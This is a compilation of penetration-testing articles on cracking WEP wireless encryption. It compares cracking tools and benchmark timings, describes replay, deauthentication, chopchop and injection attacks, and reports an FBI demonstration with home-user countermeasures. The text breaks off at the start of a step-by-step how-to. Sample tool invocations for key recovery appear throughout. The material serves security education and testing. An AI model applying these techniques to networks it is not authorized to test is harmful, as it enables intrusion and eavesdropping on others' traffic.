Cracking WEP & WPA

WEP: Dead Again The Feds Can Own Your WLAN Too Cracking WEP: Step by Step Cracking WEP and WPA Wireless Networks

WEP: Dead Again

Part 1
Introduction
This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.

Is WEP that bad?

Many security folks and even more wireless folks these days are saying that WEP isn't all that bad. They say that if you use modern equipment that filters weak Initial Vectors (IVs) and change your keys frequently (or at least once in a while), nobody will ever crack your WEP. Sure, maybe some next-generation WEP attacks will arise one day that will change everything, but WEP is okay today for all but the most sensitive networks. Well, that next-generation is already here, heralded by highly functional tools that make WEP look weaker than Barney Fife on guard duty, sleeping on the job. Let's take a look at some of the new tools that should be in every penetration tester's bag of tricks, rather then delving into the details of why the various attacks work. Time and time again, the industry has shown that it will not reject broken security safeguards until attacks are actually demonstrated in the real world. Here's how to quickly turn some heads.

The way things were

Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think. The first caveat to this old approach is that only encrypted packets count. As wireless access points transmit unencrypted beacons several times per second, it is easy to be fooled into believing that you have a larger number of useful packets than you really do. If you use Kismet for network discovery and sniffing, it breaks down the packet count for you, displaying the number of "Crypted" packets separately from the total number, as shown below:

Figure 1. Kismet in action.

The second thing working against your packet collection efforts is that only certain "interesting" or "weak" IVs are vulnerable to attack. Kismet also tells you how many of these have been gathered, although it may not use the same counting method as the various cracking tools. To make matters more difficult, wireless manufacturers responded to the FMS attack by filtering out the majority of weak IVs that their access points and wireless cards transmit. Unless your target network is using old equipment, chances are you'll have to collect no less than ten million encrypted packets to crack a WEP key using these older tools. In early 2002, h1kari released a tool called dwepcrack (part of the bsd-airtools package) that improved upon the existing implementations of the FMS attack. Although dwepcrack did a good job of advancing the practical implementation of statistical WEP cryptanalysis, its improvements were only incremental.

Tools that changed everything

On August 8th, 2004, a hacker named KoreK posted new WEP statistical cryptanalysis attack code (soon to become a tool called chopper) to the NetStumbler forums. While chopper is functional, it is not currently maintained, and the attacks have since seen better implementations in aircrack and WepLab. However, the KoreK attacks change everything. No longer are millions of packets required to crack a WEP key; no longer does the number of obviously "weak" or "interesting" IVs matter. With the new attacks, the critical ingredient is the total number of unique IVs captured, and a key can often be cracked with hundreds of thousands of packets, rather than millions.

Aircrack
The first tool in our new WEP cracking toolbox is aircrack by Christophe Devine. Implementing KoreK's attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. To give aircrack a try, simply collect as many packets as possible from a WEP

encrypted wireless network, save them as a pcap file, and then start aircrack from the command line.

Figure 2. aircrack succeeds.

How many packets does it take?

The number of packets required for success with aircrack varies greatly. As a rule of thumb, shoot for a minimum of 200,000 for a 64 bit key and 500,000 for a 128 bit key, and remember to count only encrypted packets with unique IVs, not total packets. aircrack comes with a handy packet capture tool called airodump that keeps a running tally of unique IVs (the counting method is imperfect but soon to be fixed) and is capable of handling very large capture files. Personally, I find it easier to use Kismet most of the time and simply estimate the number of unique IVs based on the number of "Crypted" packets reported by Kismet. The number of encrypted packets with unique IVs is typically more than 95% of the total number of encrypted packets.

How long does it take?

I often find that aircrack determines a WEP key within a few seconds, but the execution time is highly variable. Shorter execution times require more unique IVs, more luck, and the lowest successful "fudge factor," a setting that tells aircrack how wildly it should guess when trying new keys. The higher the fudge factor, the more keys aircrack will try, increasing both the potential time of execution and the likelihood that the attack will succeed. The fudge factor has a default value of two but may be set to any positive integer. The default setting may be a good place to start, but trying several different settings is frequently fruitful if the initial attack does not succeed. I have encountered some data sets that could be cracked with a fudge factor of one, several that could only be cracked with three, four, or higher, and one data set that could only be cracked with a fudge factor of 31 or higher.

The higher the fudge factor, the more branches aircrack will take. This generally results in a longer execution time unless a successful crack happens early in the process. The following graph shows the time of execution as reported by aircrack (not counting file loading and parsing) for a particular data set with various fudge factors. Blue dots represent the time required for a successful crack and red dots represent the time spent in a failed attempt.

Figure 3. aircrack execution times.

If the default fudge factor (two) fails, I usually double it for each subsequent attack on the same data set. By terminating any attack that takes longer than five or ten minutes, I have had good luck finding a successful fudge factor fairly quickly. One of the nice features of aircrack is that it works for both 64 bit and 128 bit WEP keys by default. If you know the key length of the target network, giving the length to aircrack as a command line option can speed up the process.

WepLab
Although not quite as successful in my tests, Jose Ignacio Sanchez's WepLab provides an alternative implementation of the KoreK attacks that can be nearly as effective as aircrack, with a little experimentation. Similar to aircrack's fudge factor, WepLab provides a probability adjustment with its --perc command line option. The default --perc setting of 50% is fairly aggressive and results in relatively few branches, while higher settings increase the number of branches taken. In addition to excellent statistical attacks, WepLab provides brute force and dictionary cracking attacks that can be very effective. This combination of techniques makes WepLab an essential tool.

Comparing the tools

WepLab and aircrack are certainly impressive, but are they the best tools in the box? To find out, I performed a series of tests comparing the ability of several statistical WEP cracking tools. To set up the test, I configured a wireless access point with a random 128 bit WEP key, generated a great deal of traffic, and collected about 25 million encrypted packets. I then carved up the capture into shuffled subsets of various lengths and tried to crack each subset with each tool, measuring the number of seconds for every successful crack (including file load times). Trials that lasted more than ten hours were terminated. The results surprised me quite a bit. 128 bit Cracking Time in Seconds Air Wep crack Air Wep Lab WEP (4) Snort Lab (95) Crack
245 249 230 184 176 154 150 74 87 51 Failed 49 46 Failed 12 9 8 18 27 7 16116 13 6 5 Failed 92 41 114 90 70 69 Failed Failed 37 Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed 5 Failed Failed Failed Failed Failed 244 247 229 179 174 153 151 77 101 54 Failed 56 52 11 13 13 11 13 Long 5 Long Long 6 Long Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed Failed

Data Weak Packets IVs

23457438 21016149 19584364 15690079 15628308 11743639 11739339 7829104 7799213 4175159 3914568 3914553 3884657 978652 978633 977219 684992 683605 587184 489293 489286 391465 391433 293596 293579 8560 1807 9340 8694 5505 8473 3037 1001 5225 1554 767 3958 1490 986 371 264 143 238 117 103 115 78 78 65 65

Unique IVs
16775533 16775167 16275925 12860342 12361369 11743639 11693841 5031233 7779299 4069824 3914568 3914553 3864743 978652 978633 974902 684992 681288 587184 489293 489286 391465 391433 293596 293579

Air crack
Failed Failed Failed Failed Failed Failed Failed Failed Failed 52 Failed 48 48 Failed Failed Failed 8 Failed Failed 8 15 5 Failed Failed Failed

Dwep crack
Error Failed Failed Error Failed Error Failed Error Failed Failed Error Error Failed Error Error Failed Error Failed Error Error Error Error Error Error Error

Table 1. 128 bit WEP Cracking Times (in seconds)

Although aircrack was successful with the greatest number of data sets, it did not perform as well as I expected with the default fudge factor. In fact, beyond about four million packets, its success rate

with default options noticeably declined with the addition of more packets. This problem was easily remedied, however, by increasing the fudge factor. A fudge factor of four was successful in nearly every case. In the few cases in which a fudge factor of four did not work, I was able to find a successful setting in the five to twenty range. WepLab's nearly complete failure with default options was surprising, but a little experimentation resulted in a --perc setting of 95% that rivaled even aircrack's best results. For some data sets, WepLab was more successful than aircrack; for others, aircrack was the winner. Overall, both tools yielded outstanding results with minor tweaking, though aircrack edged out WepLab in the smaller data sets. AirSnort's success rate matched my expectations quite closely, cracking nearly every key with ten million or more packets but failing most of the time when using a smaller data set. AirSnort's speed beat out aircrack and WepLab in every case. Of course, an extra minute or two is rarely a concern, so the superior cracking ability of the KoreK attacks with far less required input puts WepLab and aircrack well above AirSnort in my book. The most unexpected results were the total failures of WEPCrack and dwepcrack with all data sets. WEPCrack came up with as many as eleven out of thirteen correct bytes but always included incorrect bytes in its final result. Lacking a process to verify the correctness of a key, WEPCrack produced a false positive result every time. dwepcrack failed in every case, complaining of either "insufficient ivs," the inexplicable error, "unable to find a valid data packet in logfile," or, for my largest data set, "File too large." As the tests were performed under Linux, perhaps dwepcrack would be more successful in its native BSD environment.

Don't ignore the obvious

WepLab and aircrack make statistical attacks alarmingly easy, but many keys can be cracked without going to such lengths. The simple fact is that most people don't choose strong encryption keys, in part because vendors make it so easy to use weak ones. Because of this weakness, a great number of WEP encrypted networks are vulnerable to dictionary or brute force attacks that only require the capture of a single encrypted data packet to attempt. The simplest brute force attack involves trying every possible binary key, a process that is completely impractical for 128 bit keys but may be worth trying for 64 bit keys if you have a few supercomputers lying around. WepLab and dwepcrack provide the ability; you provide the CPU cycles. WepLab and WepAttack both provide two dictionary attack methods, one based on the more common MD5 hashing technique that many access points use to turn a passphrase into a binary WEP key, and the other using null terminated raw ASCII WEP keys, employed by a few devices. Knowledge of the target network hardware may help to determine which method would be preferred for a particular environment. Because both of the above tools can use any dictionary in a text file or standard input, powerful password cracking utilities such as John the Ripper may be used to generate the word list. Combined with John's ability to apply rules (various capitalizations, appending numbers, etc.) to a basic

dictionary, these tools result in a successful crack surprisingly often. Although both performed dictionary attacks successfully in my tests, WepLab executed faster while WepAttack provided the convenience of multiple simultaneous attack modes. If a dictionary attack fails, an optimized brute force attack based on the vendor's passphrase method may be fruitful. For devices that use null terminated ASCII keys, WepLab offers a brute force attack that only tries ASCII bytes, resulting in a somewhat smaller (though still generally too large) key space. For the more common MD5 hashed passphrases, dwepcrack can execute an optimized brute force attack for 64 bit keys. This method, devised and first implemented by Tim Newsham, dramatically reduces the potential key space from 2^40 to 2^21 possible keys, resulting in an extremely fast attack.

The complete toolbox

Featuring the most effective statistical attacks available, aircrack may be the single most important tool in the box. WepLab is also essential, providing several techniques including an excellent alternative implementation of the KoreK attacks. AirSnort may be worth trying if you have a lot of packets to work with, but its position as statistical attack leader has been usurped. WepAttack is a nice addition for dictionary attacks, and dwepcrack provides the most fruitful brute force technique. The only other essential ingredient is a method to collect packets; while most of these tools include packet gathering as a built-in ability or ancillary program, I personally prefer Kismet for this function. All of these tools are available in the Auditor Security Collection live Linux CD-ROM.

Concluding part one

Looking at the outstanding success rate of aircrack and WepLab in the 500,000 to 1,000,000 packet range, it is clear that a new era is upon us. Vendors' efforts to limit the transmission of weak IVs have been blown away, and the time required to collect packets for a successful statistical attack has been reduced twentyfold. If you thought WEP was okay, think again. All of the tools discussed so far are completely passive, receiving data but transmitting nothing. In part two, we will look at active WEP attacks, including a method to dramatically increase the rate of packet collection, making statistical attacks even more potent. Fasten your seat belts.

Notes:
Because a majority of the tools refer to 64 bit and 128 bit key lengths, this article adopts the convention. It is important to realize, however, that the secret portion of a 64 bit key is only 40 bits and the secret portion of a 128 bit key is only 104 bits. All tests were performed with a 1.6GHz Pentium-M laptop running Gentoo Linux (2.6.8.1 kernel). Linux was chosen for the tests in order to accommodate the greatest number of tools. Some of the tools are also available for OS X, Windows, and/or various BSDs. In addition, there are a few tools for the other platforms that are not available for Linux. None of these, however, appear to implement the KoreK attacks except for the current development version of KisMAC.

Tool information and links:

aircrack - version: 2.1 - sample invocation: aircrack -n 128 packets.pcap - sample invocation: aircrack -f 4 -n 128 packets.pcap - source: http://www.cr0.net:8040/code/network/aircrack/ AirSnort - version: 0.2.6 - sample invocation: airsnort - 128 bit crack breadth: 2 (default) - source: http://airsnort.shmoo.com/ Auditor Security Collection - version: 081004-01 - source: http://remote-exploit.org/?page=auditor dwepcrack - version: 0.4 - sample invocation: dwepcrack -s -w packets.pcap - sample invocation: dwepcrack -b packets.pcap - source: http://www.e.kth.se/~pvz/wifi/ - notes: also tried binary from Auditor Security Collection with identical results John the Ripper - version: 1.6 - source: http://www.openwall.com/john/ Kismet - version: Kismet-2004-10-R1 - source: http://www.kismetwireless.net/ WepAttack - version: 0.1.3 - sample invocation: john -w:words.txt -rules -stdout | wepattack -m n64 -f packets.pcap - source: http://wepattack.sourceforge.net/ WEPCrack - version: 0.1.0 - sample invocation: pcap-getIV.pl -b 13 -f packets.pcap; WEPCrack.pl - source: http://wepcrack.sourceforge.net/ WepLab - version: 0.1.3 - sample invocation: weplab -rpackets.pcap --key 128 testers.pcap - sample invocation: john -w:words.txt -rules -stdout | weplab -y --key 64 --attacks 1

testers.pcap - source: http://weplab.sourceforge.net/ Ideally, the input data sets would come from a variety of source networks with varied hardware and WEP keys. Although the results are not fully comprehensive, the spot checks against various networks generally agree with the test results.

Part 2
Introduction
In part one we examined the latest generation of passive WEP cracking tools that use statistical or brute force techniques to recover WEP encryption keys from captured wireless network traffic. This time, in the second and final article, we take a look at active tools that use 802.11 transmissions to attack WEP networks. All of these active wireless attack techniques discussed in this article require the ability to inject arbitrary packets onto a wireless network. Although a variety of injection methods are available, most require Linux, are unsupported, and use hacked drivers that have support and availability problems. All of them require at least one wireless PCMCIA card based on the Prism2 chipset (such as the Senao 2511-CD-PLUS). Fortunately, the Auditor Security Collection [ref 1] live cd-rom can save you a number of headaches as it includes ready-to-use drivers for several active attack tools. Beware of network disruptions that can be caused by active attacks. Using these tools may have unpredictable effects in various environments. In my testing, I have encountered a few systems that had to be rebooted in order to function again after being bombarded with injected packets.

Rapid traffic generation

If you've spent much time sniffing wireless networks (and, if you are reading this article, I bet you have) then you probably have noticed that the source and destination MAC addresses are plainly visible for every packet even when the packet contents are encrypted with WEP. This allows you to uniquely identify hosts on the wireless network as well as hosts on a bridged, wired LAN. If you've never tried traffic analysis of an encrypted wireless network, I highly recommend the exercise. Find a busy network, fire up Ethereal [ref 2], and try to answer as many of the following questions as you can: How many access points share the same ESSID? Does the access point bridge or route traffic? Is EAP used? If so, what EAP type? Is open system or shared key authentication in use? What is the MAC address of the default gateway? What are the NIC vendors for wireless hosts? What are the NIC vendors for wired hosts? What is the vendor of the access point? Can you find a DNS transaction?

Can you find a TCP three-way handshake? Can you find an HTTP transaction? What hosts transmit/receive the most bytes/packets? Does any traffic occur with a distinct periodicity (like POP3 every 5 minutes)? Can you find any ARP traffic? (hint: frame.pkt_len==68 and wlan.da==ff:ff:ff:ff:ff:ff)

No wireless network based on WEP provides protection against replay attacks. With the right tools, you can take any captured packet and reinject it back onto the network. The packet will be correctly encrypted even though you have no idea of its contents. Then again, you may have a pretty good guess as to its contents based on traffic analysis. You might choose something that is likely to be an ARP request, hoping that it will generate a response from another host on the network. If you're right, you could replay the same packet hundreds or even thousands of times per second, forcing that host to spew an enormous stream of responses, individually encrypted with different IVs. This method described is exactly the method used by aireplay, a tool that comes with aircrack [ref 3]. A screenshot of aireplay is shown below in Figure 1. As we discovered in part one, both aircrack and WepLab [ref 4]are capable of cracking WEP keys after collecting just a few hundred thousand packets. With a successful aireplay attack, you can generate that many packets in just a few minutes. Therefore, people who say that re-keying every 10 minutes makes WEP unbreakable are dead wrong. Per-session, per-user keys also don't stand a chance against this attack. WEP is truly dead. . . again.

Figure 1. Aireplay at work.

The Auditor Security Collection live cd-rom makes it relatively easy to try aireplay because it includes aircrack's patched hostap driver by default, but you will need two wireless cards with at least several inches distance between their antennas. You may find it easier to use two laptops, one with a Prism2 card to replay captured packets, and a second to capture all the new traffic that is generated. Be prepared to spend some time finding an appropriate packet to replay; you may need to save individual packets with Ethereal and feed them to aireplay. Another tool that implements a similar attack has been around for much longer in the BSD world. Part of OpenBSD's Wnet, reinj performs the same attack as aireplay and does it all with just one Prism2 card (as does the latest beta of aireplay). Whichever tool you use to generate traffic, I recommend WepLab or aircrack for cracking the WEP key.

Encrypted packet injection

Most of the WEP attack tools on the scene today focus on cracking WEP keys, but there are also other WEP vulnerabilities that can be exploited. WEPWedgie [ref 5], a tool released in 2003 by Anton Rager, allows an attacker to craft an arbitrary plaintext packet and inject it into the wireless network without knowledge of the WEP key. The receiving stations accept the packet as if the sender used the correct key to encrypt the packet. The way WEPWedgie is able to accomplish this is by reconstructing the keystream that was used to encrypt a particular plaintext. With knowledge of some plaintext and the resulting ciphertext, a simple XOR operation yields the keystream that results from a particular IV. And because WEP allows the same IV to be used over and over again, WEPWedgie can use the keystream to correctly encrypt and inject any number of packets whose contents are limited only by the length of the known keystream. There are a number of ways that an attacker can discover the ciphertext for a known plaintext, but the method used by WEPWedgie's prgasnarf is to listen for shared key authentication. The 802.11 standard defines two types of authentication, "open system authentication" (which you can think of as "no authentication") and "shared key authentication" (which you can think of as "the most misguided authentication mechanism ever devised"). In shared key authentication, the AP transmits 128 bytes of plaintext, and then the station encrypts the plaintext and transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. Believe it or not, this horrifying scheme is still being recommended by certain vendors [ref 6] as a security enhancement, but it is less common in practice than open system authentication. Once a keystream has been captured (hint: spoofed deauthentication), WEPWedgie provides a number of interesting packet injection attacks. A simple one sends a ping to a target of your choice. The other attacks provide a method of port scanning targets on the wireless network using a chosen source address. As long as the target network has Internet connectivity, you can use the address of a host you control on a remote network and sniff the results of your scan on that host. Interpretation of the results is up to you.

Figure 2. Wepwedgie injecting pings.

To try out WEPWedgie, you'll need a system running a Linux 2.4 kernel, a Prism2 card, and Abaddon's AirJack [ref 7] driver. Unfortunately the Auditor CD's 2.6 kernel isn't supported by AirJack, so you'll have to prepare a system on your own. You might find the Wi-Fi Dog of War [ref 8] instructions helpful to get AirJack working.

Single packet decryption

KoreK, the individual who brought us the improved algorithms used in aircrack and WepLab, released a tool a few months ago on the NetStumbler forums that enables an attacker to decrypt individual packets without knowledge of the WEP key. Called chopchop [ref 9], this tool replays a single encrypted packet, modifying one byte at a time. By monitoring the access point to find out if it accepts the modified packet, chopchop is able to determine the plaintext value of that particular byte and move on to the next. Within several seconds (and thousands of replayed packets), chopchop can decrypt an entire packet. It doesn't matter what encryption key was used, or if a separate key is used for each user, or if the key changes every hour or minute; any packet can be decrypted.

Figure 3. Chopchop decrypting a single packet.

You can use the Auditor CD and a single Prism2 card to try chopchop. Use the switch-to-wlanng script that Auditor provides, pop the card out and then back in again, and the linux-wlan-ng driver will be working, complete with KoreK's injection modifications.

The next generation

Since the release of chopchop, the task of acquiring a valid keystream for encrypted packet injection has become trivial for all WEP encrypted networks. Joshua Wright is working on a new version of WEPWedgie that incorporates the chopchop attack and works with newer drivers. Christophe Devine's upcoming version of aireplay, already released as a beta, uses the same technique to allow the forgery of any ARP request. Various people are working to improve wireless drivers, including implementation of packet injection with a wider variety of hardware (prism54 is reported to work already), and construction of an abstraction layer for packet injection.

Conclusion
Some vendors continue to sell products that completely lack reasonable wireless security features. In just two months since the publication of part one of this article, I've encountered multiple brand new devices, including Wi-Fi VOIP phones and an access point provided by a cable Internet provider, that provide no encryption capability other than WEP. As long as this continues, white hats and black hats alike will keep improving the attack techniques that render WEP even worse than useless. For the most part, the newer WEP attack tools exploit vulnerabilities that were described in theory four or more years ago. Perhaps people will learn from the history of WEP the lesson that theoretical vulnerabilities will become real vulnerabilities. Until they do, you can use these penetration testing tools to assess the weaknesses of your own network and maybe even convince someone that change is needed.

Tools and links

[1] Auditor Security Collection: http://remote-exploit.org/?page=auditor [2] Ethereal: http://www.ethereal.com/ [3] aircrack: http://www.cr0.net:8040/code/network/aircrack/ [4] WepLab: http://weplab.sourceforge.net/ [5] WEPWedgie: http://sourceforge.net/projects/wepwedgie/ [6] Linksys recommends shared key authentication: http://www.linksys.com/splash/wirelessnotes.asp [7] AirJack: http://sourceforge.net/projects/airjack/ [8] Wi-Fi Dog of War Mini How-To: http://www.geekspeed.net/~beetle/download/wifi_dog.html [9] chopchop: http://www.netstumbler.org/showthread.php?t=12489

The Feds Can Own Your WLAN Too

Introduction
Millions of wireless access points are spread across the US and the world. About 70% percent of these access points are unprotected - wide open to access by anyone who happens to drive by. The other 30% are protected by WEP (Wired Equivalent Privacy) and a small handful are protected by the new WPA (Wi-Fi Protected Access) standard. At a recent ISSA (Information Systems Security Association) meeting in Los Angeles, a team of FBI agents demonstrated current WEP-cracking techniques and broke a 128 bit WEP key in about three minutes. Special Agent Geoff Bickers ran the Powerpoint presentation and explained the attack, while the other agents (who did not want to be named or photographed) did the dirty work of sniffing wireless traffic and breaking the WEP keys. This article will be a general overview of the procedures used by the FBI team. A future article will give step-by-step instructions on how to replicate the attack.

WEP Cracking - The Next Generation

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104. The IV is placed in encrypted frame's header, and is transmitted in plain text. Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets - a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key. Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!"

On with the Show

Before we get into the steps that the FBI used to break WEP, it should be noted there are numerous ways of hacking into a wireless network. The FBI team used publicly available tools and emphasized that they are demonstrating an attack that many other people are capable of performing. On the other hand, breaking the WEP key may not necessarily give an attacker complete access to a wireless network. There could also be other protection mechanisms such as VPNs or proxy servers to deal with. For the demonstration, Special Agent Bickers brought in a NETGEAR wireless access point and

assigned it a SSID of NETGEARWEP. He encrypted the access point with a 128 bit key - made by just keying in random letters and numbers. Note that normally, you have to find wireless networks before you can crack them. The two wireless scanning tools of choice are Netstumbler for Windows or Kismet for Linux. Since the other WEP cracking tools are mainly Linux-based, most people find it easier to stick with Kismet, so they don't have to switch between Windows and Linux.

Figure 2: Scanning for Networks

Another FBI agent started Kismet and immediately found the NETGEARWEP access point. Just for fun, a third agent used his laptop and ran FakeAP, a program that confuses scanning programs by putting up fake access points.

Attack!
After a target WLAN is found, the next step is to start capturing packets and convert them into pcap (short for packet capture) format. These pcap files will then be processed by other programs. Many programs, both commercial and open source, can be used to capture packets, but the two favorites seem to be Kismet or Airodump (now part of Aircrack). Ideally, one laptop should be scanning, while another laptop will be running the attack - which is what the FBI team did. About half a dozen different software tools were then used by the FBI team, and they are listed - along

with their download links - at the end of the article. Thankfully, the Auditor's Security Collection, which we reviewed last year, is a live CD that has all of these tools already installed. Even the FBI likes this distribution.

Figure 3: Capturing Packets

If a hacker is lucky enough to find an extremely busy wireless network, passive sniffing should provide enough good packets to allow the WEP key to be recovered. In most cases, however, an active attack or series of attacks are needed to jump start the process and produce more packets. Note that active attacks generate wireless traffic that can itself be detected and possibly alert the target of the attack. The FBI team used the deauth feature of void11 to repeatedly disassociate the laptop from the access point. Desired additional traffic was then generated as Windows XP tried to re-associate back to the AP. Note that this is not a particularly stealthy attack, as the laptop user will notice a series of "Wireless Network unavailable" notifications in the taskbar of their desktop screen. Another attack method the FBI team used is a replay attack. The basic premise of this attack is to capture at least one packet traveling from the victim laptop to victim access point. This packet can then be replayed into the network, causing the target AP to respond and provide more traffic to capture. Aireplay (also part of Aircrack) can perform a replay attack based on captured ARP (Address Resolution Protocol) packets, which are broadcast at regular intervals in wired and wireless networks and are easy to spot. Aireplay automatically scans a captured pcap file, pulls out the suspected ARP requests, and replays them to the access point. After about three minutes of capturing and cracking, the FBI team found the correct WEP key, and displayed it on a projected notebook screen. Agent Bickers, still speaking to the audience, turned around, looked at the screen and was surprised, "Usually it takes five to ten minutes."

Figure 4: Gotcha!

Countermeasures & Conclusion

So what can you do to prevent hackers from getting into your network? Special Agent Bickers and his team have some tips for wireless users. He stresses that these are mainly for home users and should not be considered as official FBI best practices for businesses. 1) Network segregation Put your access point on a separate subnet, with a firewall separating the wireless and

internal users 2) Change the default settings on your access point Default settings (SSID, administrator password, channel) are well known and even included as part of some WLAN attack tools 3) Use WPA with a strong key WPA is a definite improvement over WEP in providing wireless security. But the version intended for home and SOHO use - WPA-PSK - has a weakness shared by any passphrase security mechanism. The choice of simple, common and short passphrases may allow your WPA-protected WLAN to be quickly compromised via dictionary attack (more info here). 4) Update your firmware This is helpful if your AP or client doesn't currently support WPA. Many manufacturers have newer firmware for 802.11g products that add WPA support. You may also find this for 802.11b gear, but it's not as common. Check anyway! 5) Turn off the WLAN when not in use A $5 lamp timer from your local hardware store is a simple, but effective way to keep your WLAN or LAN from harm while you're sleeping. Bickers also said that if you have an access point that can swap keys fast enough, you may be able to stay ahead of an attacker. "Most likely they will get bored and attack someone else." But for most WLAN owners, this method isn't practical. The FBI demonstrated this attack to the computer security professionals at the ISSA meeting in order to show the inadequate protection offered by WEP. It is one thing to read stories of WEP being broken in minutes, but it is shocking to see the attack done right before your eyes. It was fast and simple.

To Explore Further
Tools Used

Auditor's Security Collection - Contains all the wireless hacking tools already installed Kismet Airsnort Aircrack (includes Aireplay and Airodump) void11

Cracking WEP: Step by Step

Part 1: Setup & Network Recon
Introduction
Hundreds, perhaps thousands of articles have been written about the vulnerability of WEP (W ired E quivalent P rivacy), but how many people can actually break WEP encryption? Beginners to WEP cracking have often been frustrated by the many wireless cards available and their distribution-specific commands. And things are further complicated when the beginner is not familiar with Linux. In this three part series, we will give you a step by step approach to breaking a WEP key. The approach taken will be to standardize as many variables as possible so that you can concentrate on the mechanics of WEP cracking without being hindered by hardware and software bugs. The entire attack is done with publicly available software and doesn't require special hardware - just a few laptops and wireless cards.

Figure 1: Gotcha!

This first article will help you set up your wireless lab and guide you through the scanning portion of WEP cracking. After all, you will need to find and document the wireless networks before you can crack them. The second article will describe the stimulation of the target WLAN to generate traffic and the actual process of capturing data and cracking the WEP key. After reading these two articles, you should be able to break WEP keys in a matter of minutes. A third article will turn things around and describe how to defend against multiple skill levels of wireless intruders NOTES:

A description of the basic approach and techniques used in this How To can be found in The Feds can own your WLAN too. You don't need to be a networking expert to successfully follow this How To, but you need basic familiarity with networking terminology and principles. You should know how to ping, open a Windows Command Prompt, enter command lines and know your way around the Windows networking properties screens.

What you Need

Although WEP cracking can be done from a single laptop, ideally you should have two. One laptop performs an active attack to stimulate data flow so that a sufficient number of packets can be captured in a relatively short amount of time, while the other laptop "sniffs" or captures the traffic produced by the attacking laptop. Figure 2 shows the basic idea.

You can actually run a WEP crack using one notebook equipped with a single wireless LAN card, but we don't recommend this configuration as a starting point. With only one notebook, its easy to get confused about what you're doing and we've found that the Auditor programs can get a bit unstable when used in this way.

Figure 2: Two Notebook WEP cracking setup

Note that using an active attack vs. passively capturing traffic increases your chances of detection. But it can significantly speed a WEP key crack by forcing the generation of more packets than you would normally capture in a short time from a lightly-used WLAN. Tip: Although we refer to laptops / notebooks throughout this series, you can also use desktop computers or a mixture of laptops and desktops. However, you may find using notebooks easier due their portability and the wider range of compatible PC Card wireless adapters available. Here is a list of required hardware:

Wireless Access Point - This will be the "target" access point and can be any brand. We used a Netgear WGT624 v2 A laptop or computer with wireless capability - This will be the "target" computer and it doesn't matter which wireless chipset or card the computer uses. Our lab had a surplus Dell laptop with built-in wireless that worked just fine Two 802.11b PC Cards based on the PRISM 2 chipset - Some of the programs (such as Kismet) we use in this series can support a wide variety of wireless cards. But we suggest you stick to using cards based on the PRISM 2 chipset, which are supported by all the programs we will use. We used two 2511CD PLUS EXT2 cards. The 2511-CD PLUS EXT2 has two MMCX connectors for external antennas and does not have an internal antenna.These cards are typically found under the Senao, Engenius or Wireless LAN brand names (Figure 3). You can also search this list compiled by Absolute Value Systems to find other PRISM 2-based cards.

If you purchase a wireless card that has an external antenna connector, you may want to buy an antenna and appropriate "pigtail". (The pigtail is a short cable, that connects the end of the antenna cable to

your Wi-Fi card.) This isn't always necessary since some cards with external antenna connectors also have internal antennas. But note that the 2511CD PLUS EXT2 series of cards, do not have an internal antenna, so you must purchase an antenna if you're using that card. You are welcome to use any type of external antenna you want (or none at all), but we purchased the Mobile Patch antenna pictured in Figure 4. The suction cup bottom of the patch antenna makes it wonderful for wardriving, as you can temporarily attach it to your car windows.

Figure 4: Mobile Patch Antenna

This antenna has 8dBi of gain and, like many antennas, has a short cable that terminates in an NFemale connector. For the Senao / Engenius cards, you will need to buy a pigtail with MMCX connector on one end. The connector is about 1 mm in diameter, with a very small pin in the middle

Figure 5: MMCX connector on pigtail cable

As a side note, pigtail connectors are disliked by many people. It's an extra cable to carry around, and sometimes the connector breaks off. In addition, it is a pain to disconnect the pigtail from the Wi-Fi card, as it takes a decent amount of force to pull the connector off.

The Software
While cracking WEP requires several open source tools, all of these tools are thankfully pre-installed,

on the free Auditor Security Collection LIVE CD. The CD boots a modified Kanotix Linux distribution into RAM (it doesn't touch your hard-drive) and auto-detects and configures many wireless cards. The current version of Auditor as of 12/16/2006 is auditor-200605-02 and can be downloaded as a CD Image or .ISO file. Note that there are two versions: one for systems with for systems with Intel B/G wireless cards (IPW2200) and the other for all other systems. Since this procedure is based on using a card with a PRISM 2 chipset, you'll need to download the other file. This image can be burned to a CD with any CD-burning software such as Nero (commercial) or CDBurnerXP (free). You will need to burn one CD for each of your scanning and attacking notebooks. Please donate a few bucks to the author if you find Auditor useful!

Lab Setup - Preparing the Target WLAN

